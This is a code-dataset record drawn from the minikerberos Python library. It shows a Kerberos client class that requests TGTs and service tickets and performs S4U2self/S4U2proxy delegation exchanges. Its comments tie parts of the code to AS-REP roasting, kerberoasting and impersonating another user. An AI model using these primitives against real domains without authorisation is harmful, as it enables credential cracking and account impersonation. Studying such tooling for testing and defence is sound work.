self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return | decrypt_tgt: used for asreproast attacks
Steps performed:
1. Send an empty (no encrypted timestamp) AS_REQ with all the encryption types we support
2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
3. PROFIT | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L215-L285 | [
"def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP\n\t\"\"\"\n\tCreates credential object from the TGT and adds to the ccache file\n\tThe TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.\n\n\tThis function doesn't... | class KerbrosComm:
def __init__(self, ccred, ksoc, ccache = None):
    """Kerberos client state: credentials, transport socket and ccache store."""
    # Inputs supplied by the caller.
    self.usercreds = ccred
    self.ksoc = ksoc
    self.user_ccache = ccache
    # Fresh ccache collecting every ticket we obtain.
    self.ccache = CCACHE()
    # Session state, populated by get_TGT()/get_TGS() as the exchange progresses.
    self.kerberos_TGT = None
    self.kerberos_TGT_encpart = None
    self.kerberos_TGS = None
    self.kerberos_session_key = None
    self.kerberos_cipher = None
    self.kerberos_cipher_type = None
    self.kerberos_key = None
@staticmethod
def from_tgt(ksoc, tgt, key):
    """Build a KerbrosComm from an already-obtained TGT and its session key.

    Intended for the case where the TGT was pulled from a ccache file
    rather than requested live; no user credentials are needed.
    """
    etype = key['keytype']
    comm = KerbrosComm(None, ksoc)
    comm.kerberos_TGT = tgt
    comm.kerberos_cipher_type = etype
    comm.kerberos_session_key = Key(etype, key['keyvalue'])
    comm.kerberos_cipher = _enctype_table[etype]
    return comm
def do_preauth(self, rep):
    """Answer a KDC preauthentication challenge.

    ``rep`` is the native KRB_ERROR reply whose 'e-data' advertises the
    server's supported encryption types. Re-sends the AS_REQ with an
    encrypted timestamp and returns the KDC's response message. Also
    records the negotiated cipher/key on ``self``.
    """
    # Collect the encryption types (and their salts) the server advertises.
    supp_enc_methods = collections.OrderedDict()
    for enc_method in METHOD_DATA.load(rep['e-data']).native:
        data_type = PaDataType(enc_method['padata-type'])
        if data_type not in (PaDataType.ETYPE_INFO, PaDataType.ETYPE_INFO2):
            continue
        loader = ETYPE_INFO if data_type == PaDataType.ETYPE_INFO else ETYPE_INFO2
        enc_info_list = loader.load(enc_method['padata-value'])
        for enc_info in enc_info_list.native:
            etype = EncryptionType(enc_info['etype'])
            supp_enc_methods[etype] = enc_info['salt']
            logger.debug('Server supports encryption type %s with salt %s' % (etype.name, enc_info['salt']))

    logger.debug('Constructing TGT request with auth data')
    # AS_REQ with an encrypted timestamp for authentication.
    pa_data_1 = {
        'padata-type': int(PADATA_TYPE('PA-PAC-REQUEST')),
        'padata-value': PA_PAC_REQUEST({'include-pac': True}).dump(),
    }
    now = datetime.datetime.utcnow()
    # ASN.1-encoded timestamp that will prove knowledge of the user key.
    timestamp = PA_ENC_TS_ENC({'patimestamp': now, 'pausec': now.microsecond}).dump()

    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
    logger.debug('Selecting common encryption type: %s' % supp_enc.name)
    self.kerberos_cipher = _enctype_table[supp_enc.value]
    self.kerberos_cipher_type = supp_enc.value
    self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(supp_enc))
    enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)

    pa_data_2 = {
        'padata-type': int(PADATA_TYPE('ENC-TIMESTAMP')),
        'padata-value': EncryptedData({'etype': supp_enc.value, 'cipher': enc_timestamp}).dump(),
    }
    kdc_req_body = {
        'kdc-options': KDCOptions(set(['forwardable','renewable','proxiable'])),
        'cname': PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]}),
        'realm': self.usercreds.domain.upper(),
        'sname': PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]}),
        'till': now + datetime.timedelta(days=1),
        'rtime': now + datetime.timedelta(days=1),
        'nonce': secrets.randbits(31),
        # Encrypt only with the negotiated type.
        'etype': [supp_enc.value],
    }
    kdc_req = {
        'pvno': krb5_pvno,
        'msg-type': MESSAGE_TYPE.KRB_AS_REQ.value,
        'padata': [pa_data_2, pa_data_1],
        'req-body': KDC_REQ_BODY(kdc_req_body),
    }
    req = AS_REQ(kdc_req)
    logger.debug('Sending TGT request to server')
    return self.ksoc.sendrecv(req.dump())
def get_TGT(self, override_etype = None, decrypt_tgt = True):
    """
    Request a TGT from the KDC, storing the ticket and session key on self.

    decrypt_tgt: used for asreproast attacks; when False the AS-REP is
        returned undecrypted (we may not even have the key material for it)
    override_etype: optional list of etype values (int) to advertise
        instead of the credential's supported enctypes

    Steps performed:
        1. Send an empty (no encrypted timestamp) AS_REQ with all the encryption types we support
        2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)
        3. PROFIT
    """
    logger.debug('Generating initial TGT without authentication data')
    now = datetime.datetime.utcnow()

    # AS-REQ body; times one day out, random nonce.
    kdc_req_body = {}
    kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
    kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
    kdc_req_body['realm'] = self.usercreds.domain.upper()
    kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
    kdc_req_body['till'] = now + datetime.timedelta(days=1)
    kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
    kdc_req_body['nonce'] = secrets.randbits(31)
    if override_etype is None:
        kdc_req_body['etype'] = self.usercreds.get_supported_enctypes()
    else:
        kdc_req_body['etype'] = override_etype

    # Ask the KDC to include a PAC in the ticket.
    pa_data_1 = {}
    pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
    pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()

    kdc_req = {}
    kdc_req['pvno'] = krb5_pvno
    kdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value
    kdc_req['padata'] = [pa_data_1]
    kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)

    req = AS_REQ(kdc_req)
    logger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())
    rep = self.ksoc.sendrecv(req.dump(), throw = False)
    if rep.name != 'KRB_ERROR':
        # User can do kerberos auth without preauthentication!
        self.kerberos_TGT = rep.native
        # If we want to roast the asrep (tgt rep) part then we dont even have
        # the proper keys to decrypt, so we just return; the asrep can be
        # extracted from this object anyhow.
        if not decrypt_tgt:
            return
        # etype 23 == ARCFOUR-HMAC-MD5 (RC4), the enctype derivable from the
        # NT hash alone.
        self.kerberos_cipher = _enctype_table[23]
        self.kerberos_cipher_type = 23
        self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
    else:
        if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
            raise KerberosError(rep)
        rep = rep.native
        logger.debug('Got reply from server, asking to provide auth data')  # fixed typo: was 'asikg'
        rep = self.do_preauth(rep)
        logger.debug('Got valid TGT response from server')
        rep = rep.native
        self.kerberos_TGT = rep

    # Decrypt the AS-REP enc-part (key usage 3) and cache the session key.
    cipherText = rep['enc-part']['cipher']
    temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
    self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
    self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
    self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
    logger.debug('Got valid TGT')
    return
def get_TGS(self, spn_user, override_etype = None):
    """Fetch a service ticket (TGS) for ``spn_user`` using the cached TGT.

    spn_user: KerberosTarget describing the service principal.
    override_etype: None or list of etype values (int); mostly used for
        kerberoasting — overrides the supported etypes advertised to the
        KDC so any ticket enctype can be received.

    Returns (tgs, encTGSRepPart, key): the raw TGS-REP, its decrypted
    enc-part and the ticket session key.
    """
    logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
    now = datetime.datetime.utcnow()

    # Request body; the etype falls back to the TGT's cipher type.
    kdc_req_body = {
        'kdc-options': KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize'])),
        'realm': spn_user.domain.upper(),
        'sname': PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()}),
        'till': now + datetime.timedelta(days=1),
        'nonce': secrets.randbits(31),
        'etype': override_etype if override_etype else [self.kerberos_cipher_type],
    }

    # Authenticator proving possession of the TGT session key.
    authenticator_data = {
        'authenticator-vno': krb5_pvno,
        'crealm': Realm(self.kerberos_TGT['crealm']),
        'cname': self.kerberos_TGT['cname'],
        'cusec': now.microsecond,
        'ctime': now,
    }
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {
        'pvno': krb5_pvno,
        'msg-type': MESSAGE_TYPE.KRB_AP_REQ.value,
        'ap-options': APOptions(set()),
        'ticket': Ticket(self.kerberos_TGT['ticket']),
        'authenticator': EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc}),
    }
    pa_data_1 = {
        'padata-type': PaDataType.TGS_REQ.value,
        'padata-value': AP_REQ(ap_req).dump(),
    }
    kdc_req = {
        'pvno': krb5_pvno,
        'msg-type': MESSAGE_TYPE.KRB_TGS_REQ.value,
        'padata': [pa_data_1],
        'req-body': KDC_REQ_BODY(kdc_req_body),
    }

    req = TGS_REQ(kdc_req)
    logger.debug('Constructing TGS request to server')
    rep = self.ksoc.sendrecv(req.dump())
    logger.debug('Got TGS reply, decrypting...')
    tgs = rep.native

    # Key usage 8: TGS-REP enc-part, encrypted under the TGT session key.
    encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
    key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])

    self.ccache.add_tgs(tgs, encTGSRepPart)
    logger.debug('Got valid TGS reply')
    self.kerberos_TGS = tgs
    return tgs, encTGSRepPart, key
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
    """
    Perform the S4U2self exchange: request a service ticket to our own
    account on behalf of ``user_to_impersonate`` (see the MS-SFU link above).

    user_to_impersonate : KerberosTarget class
    supp_enc_methods : candidate encryption types (the mutable default list
        is only read here, never mutated)

    Returns (tgs, encTGSRepPart, key).
    """
    # A valid TGT is required to build the AP-REQ below.
    if not self.kerberos_TGT:
        logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
        self.get_TGT()
    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
    auth_package_name = 'Kerberos'
    now = datetime.datetime.utcnow()

    ###### Calculating authenticator data
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now
    # Key usage 7: PA-TGS-REQ authenticator, encrypted with the TGT session key.
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ap-options'] = APOptions(set())
    ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    pa_data_auth = {}
    pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
    pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()

    ###### Calculating checksum data
    # Checksum input: little-endian name-type || username || domain || auth package.
    S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
    S4UByteArray += user_to_impersonate.username.encode()
    S4UByteArray += user_to_impersonate.domain.encode()
    S4UByteArray += auth_package_name.encode()
    logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
    logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
    # Keyed HMAC-MD5 checksum (key usage 17) over the buffer above.
    chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
    logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
    chksum = {}
    chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
    chksum['checksum'] = chksum_data

    ###### Filling out PA-FOR-USER data for impersonation
    pa_for_user_enc = {}
    pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
    pa_for_user_enc['userRealm'] = user_to_impersonate.domain
    pa_for_user_enc['cksum'] = Checksum(chksum)
    pa_for_user_enc['auth-package'] = auth_package_name

    pa_for_user = {}
    pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
    pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()

    ###### Constructing body
    krb_tgs_body = {}
    krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
    # sname is ourselves: we request a ticket to our own account.
    krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
    krb_tgs_body['realm'] = self.usercreds.domain.upper()
    krb_tgs_body['till'] = now + datetime.timedelta(days=1)
    krb_tgs_body['nonce'] = secrets.randbits(31)
    krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences

    krb_tgs_req = {}
    krb_tgs_req['pvno'] = krb5_pvno
    krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
    krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
    krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)

    req = TGS_REQ(krb_tgs_req)

    logger.debug('Sending S4U2self request to server')
    try:
        reply = self.ksoc.sendrecv(req.dump())
    except KerberosError as e:
        # Error code 16 means delegation is not enabled for this account;
        # the error is re-raised in every case.
        if e.errorcode.value == 16:
            logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
        raise e
    logger.debug('Got S4U2self reply, decrypting...')
    tgs = reply.native
    # Key usage 8: TGS-REP enc-part, encrypted under the TGT session key.
    encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
    key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
    self.ccache.add_tgs(tgs, encTGSRepPart)
    logger.debug('Got valid TGS reply')
    self.kerberos_TGS = tgs
    return tgs, encTGSRepPart, key
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
def S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
    """Perform the S4U2proxy (constrained delegation) TGS exchange.

    s4uself_ticket: Ticket obtained earlier via S4U2self, sent as the
        additional-tickets evidence.
    spn_user: KerberosTarget describing the target service SPN.
    supp_enc_methods: encryption types offered; the credential's
        preferred common one is selected.

    NOTE(review): on success the KDC reply is neither decrypted nor
    returned — the method falls off the end and returns None, so the
    proxied service ticket is unobtainable by callers. Looks unfinished;
    confirm against upstream before relying on the result.
    NOTE(review): mutable default list for supp_enc_methods; safe only
    because it is never mutated.
    """
    now = datetime.datetime.utcnow()
    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)

    # PA-PAC-OPTIONS with the RBCD bit, required for resource-based
    # constrained delegation (MS-SFU 2.2.5).
    pa_pac_opts = {}
    pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
    pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()

    # Authenticator proves possession of the TGT session key.
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now

    # Key usage 7 = TGS-REQ PA-TGS-REQ authenticator (RFC 4120 7.5.1).
    authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ap-options'] = APOptions(set())
    ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    pa_tgs_req = {}
    pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
    pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()

    krb_tgs_body = {}
    #krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))
    krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
    krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
    krb_tgs_body['realm'] = self.usercreds.domain.upper()
    krb_tgs_body['till'] = now + datetime.timedelta(days=1)
    krb_tgs_body['nonce'] = secrets.randbits(31)
    krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
    # The S4U2self ticket is the delegation evidence.
    krb_tgs_body['additional-tickets'] = [s4uself_ticket]

    krb_tgs_req = {}
    krb_tgs_req['pvno'] = krb5_pvno
    krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
    krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
    krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)

    req = TGS_REQ(krb_tgs_req)
    try:
        reply = self.ksoc.sendrecv(req.dump())
    except KerberosError as e:
        # Error 16 (KDC_ERR_PADATA_TYPE_NOSUPP) typically means delegation
        # is not configured for this account; re-raised in all cases.
        if e.errorcode.value == 16:
            logger.error('S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
        raise e
def get_something(self, tgs, encTGSRepPart, sessionkey):
    """Build the raw AP_REQ blob for an already-obtained service ticket.

    Encrypts a fresh authenticator (client name/realm/time taken from the
    stored TGT) with *sessionkey*, using the cipher indicated by the TGS
    reply, and wraps it together with the service ticket into an AP_REQ.

    tgs: native (decoded) TGS_REP structure holding the service ticket
    encTGSRepPart: decrypted enc-part of the TGS_REP (selects the cipher)
    sessionkey: Key shared with the target service
    Returns the DER-encoded AP_REQ as bytes.
    """
    now = datetime.datetime.utcnow()

    # Authenticator proves possession of the service session key;
    # ctime/cusec provide replay-detection material.
    authenticator_data = {}
    authenticator_data['authenticator-vno'] = krb5_pvno
    authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
    authenticator_data['cname'] = self.kerberos_TGT['cname']
    authenticator_data['cusec'] = now.microsecond
    authenticator_data['ctime'] = now

    # Fix: stray debug print() replaced with the module logger used everywhere else.
    logger.debug('get_something: authenticator etype %s' % encTGSRepPart['key']['keytype'])
    cipher = _enctype_table[encTGSRepPart['key']['keytype']]
    # Key usage 11 = AP-REQ authenticator (RFC 4120 7.5.1).
    authenticator_data_enc = cipher.encrypt(sessionkey, 11, Authenticator(authenticator_data).dump(), None)

    ap_req = {}
    ap_req['pvno'] = krb5_pvno
    ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
    ap_req['ticket'] = Ticket(tgs['ticket'])
    ap_req['ap-options'] = APOptions(set([]))
    # NOTE(review): the advertised etype is the TGT's cipher type while the
    # authenticator was encrypted with the TGS-negotiated cipher — looks
    # inconsistent; preserved as-is, confirm against the target service.
    ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})

    return AP_REQ(ap_req).dump()
|
skelsec/minikerberos | minikerberos/communication.py | KerbrosComm.get_TGS | python | def get_TGS(self, spn_user, override_etype = None):
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key | Requests a TGS ticket for the specified user.
Returns the TGS ticket and the decrypted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/communication.py#L287-L348 | [
"def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP\n\t\"\"\"\n\tCreates credential object from the TGS and adds to the ccache file\n\tThe TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT\n\n\... | class KerbrosComm:
def __init__(self,ccred, ksoc, ccache = None):
    """Kerberos client protocol state holder.

    ccred: user credential object (key material, supported etypes)
    ksoc: socket wrapper used to talk to the KDC
    ccache: optional user-supplied CCACHE; obtained tickets are also
        collected into a fresh internal CCACHE (self.ccache)
    """
    self.usercreds = ccred
    self.ksoc = ksoc
    self.user_ccache = ccache
    self.ccache = CCACHE()
    # Session state, filled in as the AS/TGS exchanges complete.
    self.kerberos_session_key = None    # Key shared with the KDC (from AS-REP enc-part)
    self.kerberos_TGT = None            # native AS-REP structure
    self.kerberos_TGT_encpart = None    # decrypted enc-part of the AS-REP
    self.kerberos_TGS = None            # last TGS-REP received
    self.kerberos_cipher = None         # cipher object negotiated with the KDC
    self.kerberos_cipher_type = None    # numeric etype of that cipher
    self.kerberos_key = None            # long-term key derived from usercreds
@staticmethod
def from_tgt(ksoc, tgt, key):
    """
    Sets up the kerberos object from tgt and the session key.
    Use this function when pulling the TGT from ccache file.

    ksoc: socket wrapper used to talk to the KDC
    tgt: native TGT (AS-REP) structure
    key: dict with 'keytype' and 'keyvalue' describing the session key
    Returns a KerbrosComm ready to request service tickets.
    """
    # No credentials needed (None): TGT + session key suffice for TGS requests.
    kc = KerbrosComm(None, ksoc)
    kc.kerberos_TGT = tgt
    kc.kerberos_cipher_type = key['keytype']
    kc.kerberos_session_key = Key(kc.kerberos_cipher_type, key['keyvalue'])
    kc.kerberos_cipher = _enctype_table[kc.kerberos_cipher_type]
    return kc
def do_preauth(self, rep):
    """Answer a KDC_ERR_PREAUTH_REQUIRED error with an authenticated AS_REQ.

    rep: native KRB_ERROR whose 'e-data' advertises the encryption
        types (and salts) the server accepts.
    Side effects: stores the selected cipher, etype and long-term key
    on self (kerberos_cipher, kerberos_cipher_type, kerberos_key).
    Returns the reply object of the follow-up AS_REQ.
    """
    #now getting server's supported encryption methods
    # OrderedDict keeps the server's advertised preference order.
    supp_enc_methods = collections.OrderedDict()
    for enc_method in METHOD_DATA.load(rep['e-data']).native:
        data_type = PaDataType(enc_method['padata-type'])
        if data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:
            if data_type == PaDataType.ETYPE_INFO:
                enc_info_list = ETYPE_INFO.load(enc_method['padata-value'])
            elif data_type == PaDataType.ETYPE_INFO2:
                enc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])
            for enc_info in enc_info_list.native:
                # Map etype -> salt (needed for string-to-key derivation).
                supp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']
                logger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))

    logger.debug('Constructing TGT request with auth data')
    #now to create an AS_REQ with encrypted timestamp for authentication
    pa_data_1 = {}
    pa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))
    pa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()

    now = datetime.datetime.utcnow()
    #creating timestamp asn1
    timestamp = PA_ENC_TS_ENC({'patimestamp': now, 'pausec': now.microsecond}).dump()

    supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
    logger.debug('Selecting common encryption type: %s' % supp_enc.name)
    self.kerberos_cipher = _enctype_table[supp_enc.value]
    self.kerberos_cipher_type = supp_enc.value
    self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(supp_enc))
    # Key usage 1 = AS-REQ PA-ENC-TIMESTAMP (RFC 4120 7.5.1).
    enc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)

    pa_data_2 = {}
    pa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))
    pa_data_2['padata-value'] = EncryptedData({'etype': supp_enc.value, 'cipher': enc_timestamp}).dump()

    kdc_req_body = {}
    kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','proxiable']))
    kdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [self.usercreds.username]})
    kdc_req_body['realm'] = self.usercreds.domain.upper()
    # TGT requests always target the krbtgt service of the user's realm.
    kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.usercreds.domain.upper()]})
    kdc_req_body['till'] = now + datetime.timedelta(days=1)
    kdc_req_body['rtime'] = now + datetime.timedelta(days=1)
    kdc_req_body['nonce'] = secrets.randbits(31)
